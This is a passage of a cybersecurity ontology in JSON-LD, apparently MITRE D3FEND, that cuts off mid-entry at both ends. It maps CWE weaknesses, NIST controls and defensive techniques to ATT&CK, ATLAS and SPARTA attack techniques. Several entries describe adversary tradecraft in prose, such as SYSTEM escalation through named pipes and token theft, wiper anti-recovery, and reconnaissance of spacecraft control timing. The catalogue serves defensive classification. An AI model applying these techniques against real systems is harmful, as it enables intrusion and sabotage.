      "d3f:definition": "A control flow graph is a representation of all possible control flow transfers within a program, typically computed at compile-time or link-time, including calls, jumps, and returns. The control flow graph can be used to compute a control flow policy that permits only the expected control flow transfers during process execution via control flow integrity mechanisms.",
      "rdfs:label": "Control Flow Graph",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformation"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_13",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Account Management | Disable Accounts for High-risk Individuals",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "rdfs:label": "AC-2(13)"
    },
    {
      "@id": "d3f:CWE-56",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-56",
      "d3f:definition": "The product accepts path input in the form of asterisk wildcard ('filedir*') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'filedir*' (Wildcard)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-155"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:CWE-11",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-11",
      "d3f:definition": "Debugging messages help attackers learn about the system and plan a form of attack.",
      "rdfs:label": "ASP.NET Misconfiguration: Creating Debug Binary",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-489"
      }
    },
    {
      "@id": "d3f:Model-basedReinforcementLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MBRL",
      "d3f:definition": "Model-based Reinforcement Learning refers to learning optimal behavior indirectly by learning a model of the environment by taking actions and observing the outcomes that include the next state and the immediate reward. The models predict the outcomes of actions and are used in lieu of or in addition to interaction with the environment to learn optimal policies.",
      "d3f:kb-article": "## References\nModel-Based Reinforcement Learning. In *Encyclopedia of Machine Learning*, pp. 642-644. Springer, 2010.  [Link](https://link.springer.com/referenceworkentry/10.1007/978-0-387-30164-8_556#:~:text=Model%2Dbased%20Reinforcement%20Learning%20refers,state%20and%20the%20immediate%20reward).",
      "rdfs:label": "Model-based Reinforcement Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:ReinforcementLearning"
      }
    },
    {
      "@id": "d3f:REC-0001.06",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.06",
      "d3f:definition": "Threat actors collect details of the guidance, navigation, and control (GNC) stack to predict vehicle response and identify leverage points during station-keeping, momentum management, and anomaly recovery. Useful specifics include propulsion type and layout (monoprop/biprop/electric; thruster locations, minimum impulse bit, plume keep-out zones), reaction wheels/CMGs and desaturation logic, control laws and gains, estimator design (e.g., EKF), timing and synchronization, detumble/safe-mode behaviors, and the full sensor suite (star trackers, sun sensors, gyros/IMUs, GNSS). Artifacts include AOCS/AOCS ICDs, maneuver procedures, delta-v budgets, ephemeris products, scheduler tables, and wheel management timelines. Knowing when and how attitude holds, acquisition sequences, or wheel unloads occur helps an adversary choose windows where injected commands or bus perturbations have outsized effect, or where sensor blinding and spoofing are most disruptive.",
      "rdfs:label": "Maneuver & Control - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/06/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Maneuver & Control"
    },
    {
      "@id": "d3f:ST0005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to maintain their foothold/access to command/execute code on the spacecraft.",
      "d3f:display-order": 5,
      "rdfs:label": "Persistence - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0005"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Persistence"
    },
    {
      "@id": "d3f:FileCreationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileCreationAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:CreateFile"
      },
      "d3f:d3fend-id": "D3-FCA",
      "d3f:definition": "Analyzing the properties of file create system call invocations.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-LsassProcessDumpViaProcdump_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-09-001%3AScheduledTask-FileAccess_MITRE"
        }
      ],
      "rdfs:label": "File Creation Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCallAnalysis"
        },
        {
          "@id": "_:N28165231250248479e6d502f37bc3048"
        }
      ]
    },
    {
      "@id": "_:N28165231250248479e6d502f37bc3048",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateFile"
      }
    },
    {
      "@id": "d3f:T0845",
      "@type": "owl:Class",
      "d3f:attack-id": "T0845",
      "d3f:definition": "Adversaries may attempt to upload a program from a PLC to gather information about an industrial process. Uploading a program may allow them to acquire and study the underlying logic. Methods of program upload include vendor software, which enables the user to upload and read a program running on a PLC. This software can be used to upload the target program to a workstation, jump box, or an interfacing device.",
      "rdfs:label": "Program Upload - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Program Upload"
    },
    {
      "@id": "d3f:NamedPipe",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a named pipe (also known as a FIFO for its behavior) is an extension to the traditional pipe concept on Unix and Unix-like systems, and is one of the methods of inter-process communication (IPC). The concept is also found in OS/2 and Microsoft Windows, although the semantics differ substantially. A traditional pipe is 'unnamed' and lasts only as long as the process. A named pipe, however, can last as long as the system is up, beyond the life of the process. It can be deleted if no longer used. Usually a named pipe appears as a file, and generally processes attach to it for IPC.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Named_pipe"
      },
      "rdfs:label": "Named Pipe",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Named_pipe"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Pipe"
      }
    },
    {
      "@id": "d3f:T1218.012",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218.012",
      "d3f:definition": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)",
      "rdfs:label": "Verclsid",
      "rdfs:subClassOf": {
        "@id": "d3f:T1218"
      }
    },
    {
      "@id": "d3f:CWE-566",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-566",
      "d3f:definition": "The product uses a database table that includes records that should not be accessible to an actor, but it executes a SQL statement with a primary key that can be controlled by that actor.",
      "rdfs:label": "Authorization Bypass Through User-Controlled SQL Primary Key",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-639"
      }
    },
    {
      "@id": "d3f:EX-0010.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0010.02",
      "d3f:definition": "Wipers deliberately destroy or irreversibly corrupt data and, in some cases, executable images to impair or end mission operations. Destructive routines may overwrite with patterns or pseudorandom data, repeatedly reformat volumes, trigger wear mechanisms on non-volatile memory, or manipulate low-level translation layers so recovery tools see a blank or inconsistent device. Activation can be immediate or staged, sleeping until a specific time, pass, or maintenance action, and may be paired with anti-recovery steps such as erasing checksums, undo logs, or golden images. Because wipers operate at storage and image layers that underpin many subsystems, collateral effects can cascade: autonomy enters safing without viable recovery paths, downlinks carry only noise, and subsequent updates cannot be authenticated or applied. The defining feature is irreversible loss of data or executables as the primary objective, rather than concealment or monetization.",
      "d3f:modifies": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Wiper Malware - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0010/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0010"
        },
        {
          "@id": "_:Nbedff34113fd45999cdf42124cc3b377"
        }
      ],
      "skos:prefLabel": "Wiper Malware"
    },
    {
      "@id": "_:Nbedff34113fd45999cdf42124cc3b377",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:REC-0003.03",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0003.03",
      "d3f:definition": "Beyond TT&C, many missions expose additional RF or network surfaces: high-rate payload downlinks (e.g., X/Ka-band), user terminals, inter-satellite crosslinks, and hosted-payload channels that may be operated by different organizations. Adversaries scan spectrum and public telemetry repositories for these mission-specific channels, characterizing carrier plans, burst structures, access schemes (TDMA/FDMA/CDMA), addressing, and gateway locations. For commercial services, they enumerate forward/return links, user terminal waveforms, and provisioning backends that could be impersonated or jammed selectively. In hosted-payload or rideshare contexts, differences in configuration control and key management present opportunities for pivoting between enclaves.",
      "rdfs:label": "Mission-Specific Channel Scanning - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0003/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0003"
      },
      "skos:prefLabel": "Mission-Specific Channel Scanning"
    },
    {
      "@id": "d3f:CWE-1268",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1268",
      "d3f:definition": "The product's hardware-enforced access control for a particular resource improperly accounts for privilege discrepancies between control and write policies.",
      "rdfs:label": "Policy Privileges are not Assigned Consistently Between Control and Data Agents",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:T1202",
      "@type": "owl:Class",
      "d3f:attack-id": "T1202",
      "d3f:definition": "Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)",
      "rdfs:label": "Indirect Command Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1039",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:NetworkFileShareResource"
      },
      "d3f:attack-id": "T1039",
      "d3f:definition": "Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.",
      "rdfs:label": "Data from Network Shared Drive",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:N632f4d411c91466c9693c855dc1743e9"
        }
      ]
    },
    {
      "@id": "_:N632f4d411c91466c9693c855dc1743e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkFileShareResource"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-011%3ACreateRemoteThreadIntoLSASS_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-011/"
      },
      "d3f:kb-abstract": "Actors may create a remote thread into the LSASS service as part of a workflow to dump credentials.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-011: Create Remote Thread into LSASS",
      "rdfs:label": "Reference - CAR-2021-05-011: Create Remote Thread into LSASS - MITRE"
    },
    {
      "@id": "d3f:AML.T0008.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0008.000",
      "d3f:definition": "Developing and staging AI attacks often requires expensive compute resources.\nAdversaries may need access to one or many GPUs in order to develop an attack.\nThey may try to anonymously use free resources such as Google Colaboratory, or cloud resources such as AWS, Azure, or Google Cloud as an efficient way to stand up temporary resources to conduct operations.\nMultiple workspaces may be used to avoid detection.",
      "rdfs:label": "AI Development Workspaces - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0008.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0008"
      },
      "skos:prefLabel": "AI Development Workspaces"
    },
    {
      "@id": "d3f:FileContentBlockMetadata",
      "@type": "owl:Class",
      "d3f:definition": "Content Blocks may contain metadata specific to the block's content at the beginning.",
      "rdfs:label": "File Content Block Metadata",
      "rdfs:subClassOf": {
        "@id": "d3f:FileMetadata"
      }
    },
    {
      "@id": "d3f:PhysicalAccessMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PhysicalAccessMonitoring"
      ],
      "d3f:d3fend-id": "D3-PHAM",
      "d3f:definition": "Monitoring the physical access of a specified environment through detection, recording, reviewing, and logging of who/what enters and exits areas.",
      "d3f:enables": {
        "@id": "d3f:Detect"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-SP-800-53-R5"
      },
      "rdfs:label": "Physical Access Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N83ee75b392ea4359a86e149ddfa0d1b7"
        }
      ]
    },
    {
      "@id": "_:N83ee75b392ea4359a86e149ddfa0d1b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Detect"
      }
    },
    {
      "@id": "d3f:BrowserExtension",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A browser extension is a plug-in that extends the functionality of a web browser in some way. Some extensions are authored using web technologies such as HTML, JavaScript, and CSS. Browser extensions can change the user interface of the web browser without directly affecting viewable content of a web page; for example, by adding a \"toolbar.\"",
      "d3f:extends": {
        "@id": "d3f:Browser"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Browser_extension"
      },
      "rdfs:label": "Browser Extension",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserApplication"
        },
        {
          "@id": "_:Ne41231a531e344e0aa708624060dd918"
        }
      ]
    },
    {
      "@id": "_:Ne41231a531e344e0aa708624060dd918",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:extends"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Browser"
      }
    },
    {
      "@id": "d3f:CWE-693",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-693",
      "d3f:definition": "The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.",
      "rdfs:label": "Protection Mechanism Failure",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:CWE-312",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-312",
      "d3f:definition": "The product stores sensitive information in cleartext within a resource that might be accessible to another control sphere.",
      "rdfs:label": "Cleartext Storage of Sensitive Information",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-311"
        },
        {
          "@id": "d3f:CWE-922"
        }
      ]
    },
    {
      "@id": "d3f:Deceive",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTactic"
      ],
      "d3f:definition": "The deceive tactic is used to advertise, entice, and allow potential attackers access to an observed or controlled environment.",
      "d3f:display-order": 3,
      "d3f:display-priority": 0,
      "rdfs:label": "Deceive",
      "rdfs:subClassOf": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "d3f:T1548.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1548.006",
      "d3f:definition": "Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to execute malicious applications with elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).",
      "rdfs:label": "TCC Manipulation",
      "rdfs:subClassOf": {
        "@id": "d3f:T1548"
      }
    },
    {
      "@id": "d3f:T1578.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1578.005",
      "d3f:definition": "Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.",
      "d3f:modifies": {
        "@id": "d3f:CloudConfiguration"
      },
      "rdfs:label": "Modify Cloud Compute Configurations",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1578"
        },
        {
          "@id": "_:Nde31cbf881a449d393b64b17e410f1af"
        }
      ]
    },
    {
      "@id": "_:Nde31cbf881a449d393b64b17e410f1af",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:IdentifierActivityAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:IdentifierActivityAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:Identifier"
      },
      "d3f:d3fend-id": "D3-IAA",
      "d3f:definition": "Taking known malicious identifiers and determining if they are present in a system.",
      "d3f:kb-article": "## How it works\n\nIdentifier activity analysis is the process of taking identifiers--typically known malicious identifiers--and determining the artifacts that have interacted with those identifiers.\n\nThere are many open and closed source repositories of identifiers that represent indicators of compromise. For example, VirusTotal contains hash signatures of malware and IP Addresses used by threat actors. Defenders can search for these indicators of compromise in their own systems to gain context on activity around an identifier.\n\n## Considerations\n\nIdentifier activity analysis is a good way to gain high-precision analysis, but adversaries can quickly modify their own signatures, such as hashes, to evade detection. This is related to David Bianco’s Pyramid of Pain: indicators on the lower levels (hash values, IP addresses, domain names) are easy for adversaries to change.\n\nIdentifier activity data of interest for analysis with the identifier might include, but is not limited to:\n\n* network traffic activity where the identifier was used to identify communicating entities or referred to in the communication\n* process activity referencing the identifier, especially for resource access\n* file activity referencing the identifier\n* registry settings referencing the identifier",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ThePyramidOfPain-DavidBianco"
      },
      "rdfs:label": "Identifier Activity Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:IdentifierAnalysis"
        },
        {
          "@id": "_:N1a11e88202b74384b5b6d716a179589c"
        }
      ]
    },
    {
      "@id": "_:N1a11e88202b74384b5b6d716a179589c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Identifier"
      }
    },
    {
      "@id": "d3f:drives",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x drives y: The device driver x causes a system component y to function by controlling it.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01184038-v"
      },
      "rdfs:label": "drives",
      "rdfs:seeAlso": {
        "@id": "dbr:Device_driver"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T0819",
      "@type": "owl:Class",
      "d3f:attack-id": "T0819",
      "d3f:definition": "Adversaries may leverage weaknesses to exploit internet-facing software for initial access into an industrial network. Internet-facing software may be user applications, underlying networking implementations, an assets operating system, weak defenses, etc. Targets of this technique may be intentionally exposed for the purpose of remote management and visibility.",
      "rdfs:label": "Exploit Public-Facing Application - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Exploit Public-Facing Application"
    },
    {
      "@id": "d3f:OSAPICreateSocket",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that creates a socket.",
      "d3f:invokes": {
        "@id": "d3f:CreateSocket"
      },
      "rdfs:label": "OS API Create Socket",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N844fadb1e70c47668d7c7e5988827160"
        }
      ]
    },
    {
      "@id": "_:N844fadb1e70c47668d7c7e5988827160",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateSocket"
      }
    },
    {
      "@id": "d3f:M1054",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:ApplicationConfigurationHardening"
        },
        {
          "@id": "d3f:CertificatePinning"
        }
      ],
      "rdfs:label": "Software Configuration"
    },
    {
      "@id": "d3f:BiometricAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:BiometricAuthentication"
      ],
      "d3f:authenticates": {
        "@id": "d3f:Person"
      },
      "d3f:d3fend-id": "D3-BAN",
      "d3f:definition": "Using biological measures in order to authenticate a user.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-TokenlessBiometricTransactionAuthorizationMethodAndSystem"
        },
        {
          "@id": "d3f:Reference-www.biometric-solutions.com_keystroke-dynamics"
        }
      ],
      "rdfs:label": "Biometric Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AgentAuthentication"
        },
        {
          "@id": "_:N0ff416af138c48088d511c73e336560c"
        }
      ]
    },
    {
      "@id": "_:N0ff416af138c48088d511c73e336560c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Person"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-02-002%3AGetSystemElevation_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-02-002/"
      },
      "d3f:kb-abstract": "Cyber actors frequently escalate to the SYSTEM account after gaining entry to a Windows host, to enable them to carry out various attacks more effectively. Tools such as Meterpreter, Cobalt Strike, and Empire carry out automated steps to “Get System”, which is the same as switching over to the System user account. Most of these tools utilize multiple techniques to try and attain SYSTEM: in the first technique, they create a named pipe and connects an instance of cmd.exe to it, which allows them to impersonate the security context of cmd.exe, which is SYSTEM. In the second technique, a malicious DLL is injected into a process that is running as SYSTEM; the injected DLL steals the SYSTEM token and applies it where necessary to escalate privileges. This analytic looks for both of these techniques.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-02-002: Get System Elevation",
      "rdfs:label": "Reference - CAR-2021-02-002: Get System Elevation - MITRE"
    },
    {
      "@id": "d3f:SpectralClustering",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SC",
      "d3f:definition": "Spectral clustering is a technique that identifies communities of nodes in a graph based on the edges connecting them.",
      "d3f:kb-article": "## References\nTowards Data Science. (n.d.). Spectral Clustering. [Link](https://towardsdatascience.com/spectral-clustering-aba2640c0d5b)",
      "rdfs:label": "Spectral Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:Graph-basedClustering"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_IR-4_13",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Incident Handling | Behavior Analysis",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": [
        {
          "@id": "d3f:DecoyEnvironment"
        },
        {
          "@id": "d3f:DecoyObject"
        }
      ],
      "rdfs:label": "IR-4(13)"
    },
    {
      "@id": "d3f:FileContentBlock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A section within a file that contains the main content or data payload.",
      "rdfs:label": "File Content Block",
      "rdfs:subClassOf": {
        "@id": "d3f:FileSection"
      }
    },
    {
      "@id": "d3f:AuthorizationService",
      "@type": "owl:Class",
      "d3f:definition": "An authorization service ensures that the user is authorized to have access to a particular resource. Authorization can be done through role-based access control (RBAC) or list-based access control (LBAC).",
      "rdfs:isDefinedBy": {
        "@id": "https://www.sciencedirect.com/referencework/9780122272400/encyclopedia-of-information-systems"
      },
      "rdfs:label": "Authorization Service",
      "rdfs:seeAlso": {
        "@id": "dbr:Authorization"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkService"
        },
        {
          "@id": "d3f:ServiceApplicationProcess"
        }
      ]
    },
    {
      "@id": "d3f:T1482",
      "@type": "owl:Class",
      "d3f:attack-id": "T1482",
      "d3f:definition": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)",
      "rdfs:label": "Domain Trust Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:CWE-706",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-706",
      "d3f:definition": "The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.",
      "rdfs:label": "Use of Incorrectly-Resolved Name or Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:OTCreateDataCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "OT command that creates data on a remote device.",
      "rdfs:label": "OT Create Data Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTWriteCommandEvent"
        },
        {
          "@id": "_:N6e225456eb664212b21fe9c834c70511"
        }
      ]
    },
    {
      "@id": "_:N6e225456eb664212b21fe9c834c70511",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTCreateDataCommand"
      }
    },
    {
      "@id": "d3f:CWE-1281",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1281",
      "d3f:definition": "Specific combinations of processor instructions lead to undesirable behavior such as locking the processor until a hard reset performed.",
      "rdfs:label": "Sequence of Processor Instructions Leads to Unexpected Behavior",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:CWE-829",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-829",
      "d3f:definition": "The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.",
      "rdfs:label": "Inclusion of Functionality from Untrusted Control Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-669"
      }
    },
    {
      "@id": "d3f:AML.T0008.003",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0008.003",
      "d3f:definition": "Adversaries may acquire or manufacture physical countermeasures to aid or support their attack.\n\nThese components may be used to disrupt or degrade the model, such as adversarial patterns printed on stickers or T-shirts, disguises, or decoys. They may also be used to disrupt or degrade the sensors used in capturing data, such as laser pointers, light bulbs, or other tools.",
      "rdfs:label": "Physical Countermeasures - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0008.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0008"
      },
      "skos:prefLabel": "Physical Countermeasures"
    },
    {
      "@id": "d3f:PasswordAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PasswordAuthentication"
      ],
      "d3f:d3fend-id": "D3-PWA",
      "d3f:definition": "Password authentication is a security mechanism used to verify the identity of a user or entity attempting to access a system or resource by requiring the input of a secret string of characters, known as a password, that is associated with the user or entity.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5"
      },
      "d3f:uses": {
        "@id": "d3f:Password"
      },
      "rdfs:label": "Password Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AgentAuthentication"
        },
        {
          "@id": "_:Nf7a46b167e614c85b94d393d05ffcc7e"
        }
      ]
    },
    {
      "@id": "_:Nf7a46b167e614c85b94d393d05ffcc7e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "d3f:CCI-002613_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
